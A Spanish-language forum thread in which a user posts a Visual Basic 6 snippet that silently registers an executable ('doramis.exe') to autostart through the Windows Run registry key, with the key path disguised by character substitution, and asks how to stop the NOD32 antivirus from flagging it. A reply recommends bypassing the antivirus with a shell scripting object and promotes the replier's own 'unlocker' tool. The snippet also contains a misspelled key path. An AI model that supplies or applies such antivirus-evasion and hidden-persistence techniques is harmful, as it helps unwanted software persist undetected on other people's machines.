MODIFICAR REGISTRO NOD-32 VIRUS VB6

Iniciado por elcopion, 26 Septiembre 2010, 10:37 AM

0 Miembros y 1 Visitante están viendo este tema.

elcopion

Hola a todos necesito su ayuda :D

estoy creando un programa y me salta virus con nod32 quiero modificar el registro estoy usando  este codigo

Option Explicit
' --------------------------------------------------------------
' Constants required for key locations in the registry
' --------------------------------------------------------------
  Public Const HKEY_CURRENT_USER As Long = &H80000001
  Public Const HKEY_LOCAL_MACHINE As Long = &H80000002

Private Declare Function RegCloseKey Lib "advapi32.lib" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long


Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String)
Dim Ret
RegCreateKey hKey, strPath, Ret
RegSetValueEx Ret, strValue, 0, 1, ByVal strData, Len(strData)
RegCloseKey Ret
End Sub



SaveString HKEY_CURRENT_USER, Replace$("Software|Micosoft|Windows|CurrentVersion|Run", "|", "\"), "DoraMiz", sys & "\doramis.exe"

bueno ese es un fragmento lo que sucede es que ese codigo me salta como virus en el NOD32 si comento

RegCreateKey hKey, strPath, Ret
RegSetValueEx Ret, strValue, 0, 1, ByVal strData, Len(strData)


ya no me da ningun virus pero no modifica el registro alguien me puede ayudar gracias

Elemental Code

yo al nod y el registro lo saltie usando un objeto como shell.script

Busca el programa "Elemental Unlocker"

tiene que estar por aca y ahi uso eso para cambiar el registro.

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas